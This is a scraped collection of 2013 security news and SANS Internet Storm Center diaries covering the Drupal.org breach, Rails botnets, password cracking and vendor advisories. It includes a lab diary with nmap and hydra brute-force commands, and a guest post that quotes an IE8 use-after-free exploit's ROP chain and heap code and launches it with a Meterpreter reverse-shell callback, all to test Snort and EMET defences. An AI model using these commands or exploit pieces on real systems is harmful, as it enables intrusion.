Hackin9

The Drupal security teams have identified a breach in the environment that has disclosed passwords.  As their notification here --> https://drupal.org/news/130529SecurityUpdate  states most of the passwords were salted and hashed, older passwords were not (although common practice is to store the salt value in the same table as the password, so that might not actually help much).  According to the update they are still investigating what else may have been accessed.  If you have one of those accounts happy password changing.  If you use that password anywhere else (and of course you don't) you might want to change that whilst you are at it.  

From the perspective of letting people know I must say I'm quite impressed.  They notified fairly early on, they provide some details of the incident, steps to take, actions they are taking.  From the breach notifications I have seen recently this is one of the more complete and useful ones.  

Cheers

Mark H

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Drupal.org has reset account passwords after it found unauthorized access to information on its servers.
 

Security goes military at CeBIT
iT News
It certainly helped perpetuate the cyber fear doing the rounds of late, with a few subtle reminders that infosec is being militarised — including an attempt by the Australia's Defence Signals Directorate (DSD) to ban the media from its opening keynote ...

 
LinuxSecurity.com: A vulnerability has been discovered and corrected in socat: Under certain circumstances an FD leak occurs and can be misused for denial of service attacks against socat running in server mode (CVE-2013-3571). [More...]
 
LinuxSecurity.com: Multiple vulnerabilities has been discovered and corrected in socat: A heap based buffer overflow vulnerability has been found with data that happens to be output on the READLINE address. Successful exploitation may allow an attacker to execute arbitrary code with [More...]
 
LinuxSecurity.com: USN-1831-1 introduced a regression in OpenStack Nova.
 
LinuxSecurity.com: Updated tomcat6 packages that fix two security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having [More...]
 
LinuxSecurity.com: An updated haproxy package that fixes one security issue is now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate [More...]
 
LinuxSecurity.com: Updated tomcat5 packages that fix one security issue are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having [More...]
 
LinuxSecurity.com: Several security issues were fixed in Tomcat.
 
LinuxSecurity.com: Several security issues were fixed in the kernel.
 
LinuxSecurity.com: Updated python-httplib2 packages fix security vulnerability: httplib2 only validates SSL certificates on the first request to a connection, and doesn't report validation failures on subsequent requests (CVE-2013-2037). [More...]
 
LinuxSecurity.com: Updated openvpn package fixes security vulnerability: OpenVPN 2.3.0 and earlier running in UDP mode are subject to chosen ciphertext injection due to a non-constant-time HMAC comparison function. Plaintext recovery may be possible using a padding oracle [More...]
 
LinuxSecurity.com: A privilege escalation vulnerability has been found in SPIP, a website engine for publishing, which allows anyone to take control of the website. [More...]
 
Data-center and wireless sales led growth at Cisco Systems in its fiscal third quarter, as it saw customers spending more in the U.S. and developing countries but reported continuing weakness in Southern Europe.
 

The good facility office research center not only offers great rents and lots of office space choice, but also meet the needs of local businesses. The business office space center is not just a great location to snap up modern office spaces but it is an up and coming area for development.

 
LinuxSecurity.com: KDE-Libs could be made to expose web credentials.
 

Passwords for almost one million accounts on the Drupal.org website are being reset after hackers gained unauthorized access to sensitive user data.

Drupal.org is the official website for the popular open-source content management platform. The breach is the result of an attack that exploited a vulnerability in an undisclosed third-party application, not in Drupal itself, Holly Ross, executive director of the Drupal Association, wrote in a blog post published Wednesday. The hack exposed usernames, e-mail addresses, country information, and cryptographically hashed passwords, although investigators may discover additional types of information were compromised.

"Malicious files were placed on association.drupal.org servers via a third-party application used by that site," Ross wrote. "Upon discovering the files during a security audit, we shut down the association.drupal.org website to mitigate any possible ongoing security issues related to the files. The Drupal Security Team then began forensic evaluations and discovered that user account information had been accessed via this vulnerability."

Read 7 remaining paragraphs | Comments

 

Attackers are exploiting an extremely critical vulnerability in the Ruby on Rails framework to commandeer servers and make them part of a malicious network of hacked machines, a security researcher said.

Ars first warned of the threat in early January, shortly after Rails maintainers issued a patch for the vulnerability. Ars warned at the time that the vulnerability gave attackers the ability to remotely execute malicious code on underlying servers. Criminals' success in exploiting the bug to make vulnerable machines join a botnet suggests that many server administrators still haven't installed the critical update more than four months after it was issued.

Servers that have been exploited are infected with software that caused them to join an Internet Relay Chat (IRC) channel on one of at least two servers, security researcher Jeff Jarmoc said in a post published Tuesday to his personal website. Attackers can force servers to download and execute malicious code and join new IRC channels from there. The channels required no authentication to be accessed, making it possible for competing attackers to infiltrate the chat room and take control of the compromised servers. IRC-based botnets harken back to the earlier days of computer crime because they made it easy for "script kiddies," or relatively unskilled hackers, to control huge numbers of infected machines in lock step, using a handful of pre-programmed commands.

Read 7 remaining paragraphs | Comments

 
Thanks to the XKCD comic, every password cracking word list in the world probably has correcthorsebatterystaple in it already.
Aurich Lawson

In March, readers followed along as Nate Anderson, Ars deputy editor and a self-admitted newbie to password cracking, downloaded a list of more than 16,000 cryptographically hashed passcodes. Within a few hours, he deciphered almost half of them. The moral of the story: if a reporter with zero training in the ancient art of password cracking can achieve such results, imagine what more seasoned attackers can do.

Imagine no more. We asked three cracking experts to attack the same list Anderson targeted and recount the results in all their color and technical detail Iron Chef style. The results, to say the least, were eye opening because they show how quickly even long passwords with letters, numbers, and symbols can be discovered.

The list contained 16,449 passwords converted into hashes using the MD5 cryptographic hash function. Security-conscious websites never store passwords in plaintext. Instead, they work only with these so-called one-way hashes, which are incapable of being mathematically converted back into the letters, numbers, and symbols originally chosen by the user. In the event of a security breach that exposes the password data, an attacker still must painstakingly guess the plaintext for each hash—for instance, they must guess that "5f4dcc3b5aa765d61d8327deb882cf99" and "7c6a180b36896a0a8c02787eeafb0e4c" are the MD5 hashes for "password" and "password1" respectively. (For more details on password hashing, see the earlier Ars feature "Why passwords have never been weaker—and crackers have never been stronger.")

Read 52 remaining paragraphs | Comments

 
US federal prosecutors have unsealed the indictment of seven men who were allegedly involved in the digital currency and exchange service. The service is believed to have laundered more than $6 billion since 2006
    


 
Increasingly, criminals have been trying to exploit a vulnerability in the web application framework to compromise servers. Successful intruders install a bot that waits for further instructions on IRC
    


 
Attackers have been able to remotely disable the web application firewall using crafted HTTP requests
    


 
Attackers have been able to remotely disable the web application firewall using crafted HTTP requests
    


 
WhatsApp alternative Threema offers end-to-end encryption, so that only the intended recipient is able to decrypt messages. The cryptographic IM app was previously only on iOS, but an Android version is now available
    


 
It has long been known that US defence contractors have been victims of cyber-espionage. The Washington Post has now uncovered that this has reportedly enabled China to save itself 25 years of military research
    


 
The internet payment processing service, part of eBay, does not check search strings, allowing attackers to inject arbitrary JavaScript into the user's browser. The issue can be exploited to steal access credentials
    


 
The Australian CERT has analysed previously unpublished Internet Census 2012 data. The team's findings indicate that security problems aren't caused by "stupid" users, but that they occur because of flawed coding and careless factory settings
    


 
Drupal Edit Limit Module Access Bypass Vulnerability
 
F-Secure Multiple Products ActiveX Remote Code Execution Vulnerability
 
libguestfs 'inspect-fs.c' Double Free Local Denial of Service Vulnerability
 
[ MDVSA-2013:170 ] socat
 
[ MDVSA-2013:169 ] socat
 
CA20130528-01: Security Notice for CA Process Automation (CA PAM)
 
[SECURITY][CVE-2013-2765][ModSecurity] Remote Null Pointer Dereference
 
Drupal Node Access User Reference Module Access Bypass Vulnerability
 
New features for detecting and analyzing malware in Sourcefire's FireAMP and FirePOWER products supplement flagging signature-based antimalware.

 
Though the Spamhaus DDoS attack showed the potential devastation of increasing bandwidth, DDoS attack trends show DDoS type to be just as important.

 
The software giant's May 2013 Patch Tuesday update permanently fixes the IE8 zero-day flaw found in the Dept. of Labor website attack.

 
US federal authorities have charged eight hackers in connection with a $45m debit card fraud scheme

 
The IE8 zero-day attack planted in the U.S. Labor Department's website highlights how few organizations can ward off never-before-seen attacks.

 
Microsoft released a temporary fix to mitigate attacks using the most recent Internet Explorer 8 zero day vulnerability.

 
McAfee has announced an agreement to acquire next-gen firewall maker Stonesoft for $389 million.

 
The Chinese government's alleged cyber-espionage arm remains active after a quiet period, using the same tactics revealed in Mandiant's APT1 report.

 
The US Department of Defense (DoD) has approved BlackBerry and Samsung mobile devices for use on its networks

 
A survey released by WhiteHat Security finds that website vulnerabilities have decreased steadily in recent years, though problems persist.

 
McAfee introduces two new identity and access management (IAM) products.

 
The yet-unnamed certification will seek to validate skills of cloud security pros, but it's unclear how it may complement or overlap with existing certs.

 
Security researcher HD Moore says 114,000 serial devices exposed to the Internet are highly hackable.

 
Verizon's annual breach report highlights a spate of new security research reports. However, overall conclusions from these are hard to come by.

 
The attack seeks to compromise a Twitter webpage via a man-in-the-browser attack. Trusteer warns it could be a harbinger of broader future attacks.

 
The 2013 Verizon data breach report details how authentication attacks affect organizations of all sizes, blaming single-factor passwords.

 
Verizon's 2013 breach report shows most breaches are caused by a select few attack types, and the majority of breaches aren't detected for months.

 
Verizon's annual breach report indicates outsiders still cause most breaches, and despite no one-size-fits-all defense, better risk awareness can help.

 
Big Yellow's annual report indicates a threefold rise in targeted attacks against SMBs as attackers search beyond big firms for susceptible targets.

 
Emerging enterprise antiphishing tools use testing, training to help users recognize bogus messages, addressing a long-standing defensive pain point.

 

This is a guest diary by Basil Alawi

One of the challenges that face security administrators is deploying IDS in modern network infrastructure. Unlike hubs, switches doesn't forward every packet to every port in the switch. SPAN port or network TAPS can be used as a workaround in the switched environment.

Fortunately with Vmware ESX/ESXi infrastructure we can configure a group of ports to see all network traffic traversing the virtual switch.

"Promiscuous mode is a security policy which can be defined at the virtual switch or portgroup level in vSphere ESX/ESXi. A virtual machine, Service Console or VMkernel network interface in a portgroup which allows use of promiscuous mode can see all network traffic traversing the virtual switch".

By default promiscuous mode policy is set to reject.

To enable promiscuous mode:

  1. Log into the ESXi/ESX host or vCenter Server using the vSphere Client.
  2. Select the ESXi/ESX host in the inventory.
  3. Click the Configuration tab.
  4. In the Hardware section, click Networking.
  5. Click Properties of the virtual switch for which you want to enable promiscuous mode.
  6. Select the virtual switch or portgroup you wish to modify and click Edit.
  7. Click the Security tab.
  8. From the Promiscuous Mode dropdown menu, click Accept.

Performance issues:

Using VMXNET 3 vNIC will provide better performance enhancement than other vNIC types.(Figure 1)

Figure 1(VMXNET 3)

Reserving memory and CPU resources is highly recommended to make sure that the resource will be available when it’s needed. (Figure 2)

Figure 2(Reserved Memory)

 

The test lab setup

 

The test lab consists of Vmware ESXi , Kali Linux, Security Onion and Metaspoitable. ESXi  5.1 will be the host system and  Kali VM will be the attack server, while Metaspoitable will be  the victim and Security Onion will run the snort instance.(See Figure 3)

Figure 3 (Test Lab)

Test Lab Network Diagram

 

The Network Configuration

For this experiment the vswicth has been configured with two ports groups. Virtual Machines port group which the default promiscuous mode is set to the default value "Reject" .The second port group is Promiscuous which the promiscuous mode is set to "Accept" ( See Figure 4) 

Figure 4 (Vswitch Configuration)

The Security Onion has been configured with two network interfaces, eth0 for management with IP 192.168.207.12 and eth1 without IP address. eth0 is connect to the "VM Network" port group and eth1 is connected to the "Promiscuous" port group.

 

 

 

Testing Snort:

 

The first test is scanning the metaspoitable vm with NMAP by running and snort detected this attempted successfully. (Figure 5)

nmap 192.168.207.20

 

 

Figure 5 (Snort alerts for Nmap scans)

 

The second test is trying to brute forcing metaspoitable root password using hydra (Figure 6):

 

hydra –l root –P passwordslist.txt  192.168.207.20 ftp

 

 

 

Figure 6  (Hydra brute force alerts)

 

The third attempt was using metasploit to exploit metaspoitable (See Figure 7).

Figure 7  (metasploit alerts)

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Following is a guest post from TJ O'Connor, @ViolentPython, (http://www.linkedin.com/pub/tj-oconnor/43/37/81b), author of Violent Python  SANS Technical Institute graduate, and GSE .

 
What do Nuclear Scientists, Microsoft, and Metasploit have to do with keeping me honest? As everyone was celebrating the New Year on January of this year, my buddy Russ McRee posted some of my rambling thoughts to the Internet Storm Center about how EMET could protect against unknown future attacks (0-days). At the time, I tested Microsoft Enhanced Mitigation Experience Toolkit (EMET) 3.5 Tech Preview against CVE-2012-4792  found rigged on the Council of Foreign Relations Website. It is fair to say at that time I was working from a very biased perspective. The attack had already occurred and it was easy to look back in time and say EMET would have been successful in protecting against it. As every arm chair quarterback knows, it is easy to look into the past. However, as the boastful and arrogant person I can sometimes be, I claimed EMET could stop future attacks as well against novel exploits (0-days).  On the podcast the following day, Johannes noted my work and effectively said time will only tell. 
 
Well last fast forward four months. Chinese Hackers from the Deep Panda Group successfully injected a novel exploit into the Department of Labor’s Website  on May 1st, 2013. Arguably, the attack was directed at scientists that likely work in nuclear weapons research based on the content of the page. 
 
 
Figure 1: Infected DOE Web Page as seen on May 1, 2003
 
Maintaining the shift of attacks seen in early 2012, the attackers continued their campaign of watering-hole attacks. Described in a report by Symantec , the term watering hole makes reference to a hunting technique. Rather than search for the herd throughout the forest, hunters sit idly by at the watering hole, knowing the animals will eventually come to drink. Applied to hacking, watering hole attacks apply the same concept: infect a place where you know your target will visit. In the case of the May 1st attack, Deep Panda hoped nuclear scientists would visit a page on dealing with possible exposure to nuclear materials.
 
After successful exploitation, the exploit downloaded a variant of the Poison IVY Remote Access Toolkit (RAT) (http://www.poisonivy-rat.com), checked for the presence of and attempted to kill popular anti-virus (Avira, Bitdefender, AVG, ESET, Avira, Dr. Web, Sophos, F-Secure, Kaspersky). I’m making assumptions here, but at this point handlers from Deep Panda probably took over the target and began pillaging intellectual property and personal secrets belonging to the scientists. For further information about the attack, check out some great blog posts by Invincea and AlienVault 
 
Would EMET 3.5 have stopped the attack as I predicted four months earlier? Yes, I am fully aware EMET 4v Beta is available for download.  But I am trying to remain honest to my words from January 1st. Let’s see. The team at Metasploit reproduced the exploit used in the attack and posted the source
 
Examining the source code from Metasploit version of the exploit (dubbed cgenericelement_uaf since it is a use-after-free for cgenericelement), it appears the attack compromises only targets running Internet Explorer 8 on Windows XP SP3, Vista, Server 2003, or Windows 7 machines. Lets examine a couple minor aspects of the exploit. First, the authors (Sinn3r, Juan Vazquez, and EMH) wrote the exploit to bypass Data Execution Protection using a ROP Chain. This can be seen in Figure 2. In fact, it again uses the msvcrt.dll ROP chain. 
 
rop_payload = ''
 
case t['Rop']
when :msvcrt
algin  = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
chain = ''
 
if t.name == 'IE 8 on Windows XP SP3'
chain =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN 
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
].pack("V*")
 
<..SNIPPED..>
 
 rop_payload = chain + algin + payload.encoded
 
Figure 2: Msvcrt.dll ROP Chain Creation in ie_cgenericelement_uaf Exploit
 
Next, the authors used a newly developed Mstime No-Spray Technique to place the encoded payload into the heap. What’s interesting to note is that the new technique for placing shellcode into the heap was only integrated into the Metasploit Framework on April 1st, 2013 by wchen. (https://gist.github.com/wchen-r7/ac29eb40fb33ddb5ab29). Using the CTIMEAnimationBase in Mstime, the technique allocates an array of pointers to controllable strings. As this exploit demonstrates, this only works against Internet Explorer 8 or prior, since IE 9 does not support the function in Mstime. 
 
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
 
magenta = unescape("#{align_esp}");
 
<..SNIPPED..>
 
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 
Figure 3: Mstime No-Spray Technique in ie_cgenericelement_uaf Exploit
 
So if you put the pieces together, we have a novel exploit (ie – an exploit without a signature), use of the msvcrt.dll ROP chain, a novel method for placing shellcode into the heap (Novel by the standards of EMET 3.5) and some shellcode to execute the Meterpreter. Lets fire up the exploit and browse to it . Figure 4 shows how to successfully start the exploit from the Metasploit framework. Here we will stand up an instance of the exploit on a webserver on TCP Port 8080, and have our payload (the Meterpreter) call back on TCP Port 4444. 
 
msfcli exploit/windows/browser/ie_cgenericelement_uaf SRVHOST=10.10.10.104 SRVPORT=8080 payload=windows/Meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.10.104 E
 
Figure 4: Launching the ie_cgenericelement_uaf Exploit From Metasploit
 
We browse the new target at http://10.10.10.104:8080/dol with a victim Internet Explorer 8 on an unpatched Windows XP SP3 and see that the exploit successfully executes its payload, establishing a Meterpreter session on the victim.
 
 
Figure 5: Successful Compromise Using ie_cgenericelement_uaf Exploit
 
Ok, so we know the exploit works. Now lets install EMET 3.5 and repeat the exercise. We’ll begin by enabling all the protection mechanisms that EMET provides. 
 
Figure 6: Enabling All EMET Protection Mechanisms For Internet Explorer
 
With EMET 3.5 installed, we attempt the exploit again and EMET 3.5 immediately detects the Stack Pivot included in the msvcrt.dll ROP chain. 
 
Figure 7: Stackivot Detected By EMET 3.5
 
Next, we disable the StackPivot detection and protection mechanism in EMET and repeat. This time, the exploit successfully begins the ROP chain but is stopped at 0x77c1110c when the chain attempts to call VirtuAlloc() in an attempt to bypass Data Execution Protection (DEP). EMET 3.5 uses a mechanism to detect who is calling VirtualAlloc() and does not permit it to be called outside of the kernel.  
 
 
Figure 8: VirtualAlloc() Caller Checking in EMET 3.5
 
Ok, we disable the CallerChecking functionality and repeat. This time, the ROP Chain again fails when SimExecFlow detects ROP gadgets in use. SimExecFlow simulates the execution flow after the return address and detects subsequent ROP gadgets. Essentially, EMET 3.5 looks at the stack, sees a series of addresses that point to a couple instructions, followed by a RET-like instruction and identifies the ROP chain. Ok, so this won’t work. 
 
 
Figure 9: SimExecFlow Detecting ROP Gadgets in Use
 
We disable SimExecFlow checking and run the exploit again. This time, the exploit steps the entire way through our ROP chain and successfully places our shellcode into a region of executable memory. However, as soon as the shellcode begins to execute we are presented with a new error message. 
 
 
Figure 10: Export Address Table Access Filtering in EMET 3.5
 
We are reminded that in order to do anything useful (downloading a stager, adding a registry key, adding a user) with shellcode, we need to make calls to the Windows API. By accessing the export address table, shellcode can determine the location of useful APIs (most commonly in kernel32.dll or ntdll.dll). Without accessing the export address table, it proves difficult to find the location of specific required API calls. And thus, EMET 3.5 successfully detects this behavior and ceases the shellcode from executing further. So with several protection mechanisms disabled, EMET completely misses the exploit but catches and stops its payload. 
 
So at this point, I’m pretty happy. EMET has kept me honest against Deep Panda and their threat towards Nuclear Scientists. What I said four months earlier that EMET 3.5 preventing against novel attacks held very true four months after I said it. But there is a small caveat. Remember that No-Spray method I mentioned? EMET 3.5 failed to detect it in usage. In fact, repeating the exercise with EMET 4v Beta
also missed the No-Spray. Feature request, Microsoft?

 

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

You're Being Hacked
Daily Beast
Around the time he became the Jester, he told the website Infosec Island, “I do wrestle with whether what I am doing is right.” In his 2012 chat with University of Southern Maine students, he acknowledged that he violates “the same laws the bad guys do.

 

The Network and Malware, Part Deux
Dark Reading
We like joining forces on occasion, even though we're nominally competitors – and it's not just because in the infosec pop charts, analysts rank right down there with Big 4 auditors and the SEC. Think of it either as collusion to take over the industry ...

 

Blended security threats require a unified response
ComputerWeekly.com (blog)
In a recent survey released during Infosec Europe 2013, 93% of large organisations reported that they had been breached in the past year, as did 87% of small organisations. And the report also shows that they are being breached more often with every ...

 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Just like on Twitter, Facebook is now putting a small, blue check mark next to the names of celebrities and other high-profile people and businesses on the site to signify their authenticity.
 
Google is kicking off its latest effort to help Gmail users manage their messages -- a redesigned inbox.
 
Despite the growing threat of state-sponsored cyberattacks launched from China and other countries, U.S companies should not be allowed fight back on their own, security experts say.
 
The long-running war between Google and Microsoft may never have a winner, an analyst said today, but it definitely has a loser: customers.
 
Apple CEO Tim Cook spent more than an hour answering questions at the AllThingsD conference yesterday, but said little that was newsworthy
 
Hewlett-Packard has updated a number of its software packages and services to help developers and IT managers modernize their applications so they will better fit into today's always connected environment.
 
The weather is good for more than just small talk, says Maryfran Johnson. It's a big business, with companies like The Weather Channel and AccuWeather selling data analytics to businesses like DHL and Sears, who use weather data to make timely decisions.
 
At Energy Future Holdings, CEO John Young emphasizes the human factors behind IT, supports standardization and expects the CIO to work with business partners.
 
Nissan and some other big brands have suspended advertising campaigns on Facebook after ads were apparently displayed next to offensive content on the site.
 
Dish Network has boosted its bid for Clearwire to US$4.40 per share, 29 percent above Sprint Nextel's most recent offer, and said it is prepared to buy up the stock of a minority of shareholders.
 

Posted by InfoSec News on May 29

http://www.rollingstone.com/politics/news/jeremy-hammond-pleads-guilty-to-stratfor-hack-20130528

By JOHN KNEFEL
Rolling Stone
MAY 28, 2013

Jeremy Hammond pleaded guilty today to the infamous Stratfor hack, as
well as taking responsibility for eight additional hacks of law
enforcement and defense contractor websites in 2011 and 2012. As a
condition of the plea, the radical hacker will face a maximum of 10
years in federal prison, and...
 

Posted by InfoSec News on May 29

http://www.chicagotribune.com/news/local/suburbs/park_ridge_niles/chi-niles-wilmette-skimming-device-20130528,0,1994190.story

By Brian L. Cox
Chicago Tribune
May 28, 2013

Authorities have charged a Niles man in connection with an "ATM
skimming" investigation at a Chase bank in Wilmette, and are working
with agents from the U.S. Secret Service to determine the scope of the
alleged criminal enterprise, officials said today.

Miroslav...
 

Posted by InfoSec News on May 28

http://www.washingtonpost.com/world/national-security/confidential-report-lists-us-weapons-system-designs-compromised-by-chinese-cyberspies/2013/05/27/a42c3e1c-c2dd-11e2-8c3b-0b5e9247e8ca_story.html

By Ellen Nakashima
The Washington Post
May 27, 2013

Designs for many of the nation’s most sensitive advanced weapons systems
have been compromised by Chinese hackers, according to a report prepared
for the Pentagon and to officials from...
 

Posted by InfoSec News on May 28

Forwarded from: Richard Forno <rforno (at) infowarrior.org>

I gather we've got the whole who's-attacking-us cyber-attribution thing
all figured out with absolute unmistakable 100% certainty? I had no
idea. Awesome!

If not, who's going to hold a US company liable for "collateral damage"
in accidentally or mistakenly hacking/crashing some innocent person's
computer/server? Who gets held responsible for...
 

Posted by InfoSec News on May 28

http://www.news.com.au/technology/hacking-chinese-spies-steal-asio-blueprints/story-e6frfro0-1226651694269

By MILES GODFREY
AAP
May 27, 2013

SECRET and highly sensitive blueprints outlining the layout of
Australia's top spy agency's new headquarters have been stolen by
Chinese hackers, the ABC says.

The documents contained details of the ASIO building's floor plans,
communication cabling layouts, server locations and security...
 

Posted by InfoSec News on May 28

http://articles.economictimes.indiatimes.com/2013-05-27/news/39557244_1_security-software-cyber-security-software-names

By J Srikant
ET Bureau
May 27, 2013

The country's top security agencies are not happy that they have to rely
on foreign-made security software from the likes of Symantec and McAfee
to protect India's critical information technology infrastructure.

The call to move away from popular commercial anti-virus and...
 

Posted by InfoSec News on May 28

http://www.taipeitimes.com/News/front/archives/2013/05/25/2003563107

By Shih Hsiu-chuan and Chris Wang
Taipei Times Staff reporters
May 25, 2013

The government experienced a cyberattack on the electronic interchange
system for official documents early this month, but no confidential
information was stolen, an Executive Yuan official confirmed yesterday
following local media reports.

While keeping mum on its findings in tracing the hacking,...
 

Posted by InfoSec News on May 29

http://www.wired.com/dangerroom/2013/05/pentagon-cyberwar-angry-birds/

By Noah Shachtman
Danger Room
Wired.com
05.28.13

The target computer is picked. The order to strike has been given. All
it takes is a finger swipe and a few taps of the touchscreen, and the
cyberattack is prepped to begin.

For the last year, the Pentagon’s top technologists have been working on
a program that will make cyberwarfare relatively easy. It’s called Plan...
 

Posted by InfoSec News on May 29

http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/

By Dan Goodin
Ars Technica
May 27, 2013

In March, readers followed along as Nate Anderson, Ars deputy editor and
a self-admitted newbie to password cracking, downloaded a list of more
than 16,000 cryptographically hashed passcodes. Within a few hours, he
deciphered almost half of them. The moral of the story: if a reporter
with zero training in the...
 

Posted by InfoSec News on May 29

http://www.thesmokinggun.com/buster/guccifer-hacks-obama-intelligence-official-567983

The Smoking Gun
MAY 28, 2013

After detours targeting “Sex and the City” author Candace Bushnell and
journalist Carl Bernstein, the hacker “Guccifer” has returned to his
bread and butter criminality, breaking into the e-mail account of an
Obama administration official who heads the National Intelligence
Council.

The breach of Christopher Kojm’s...
 
Internet Storm Center Infocon Status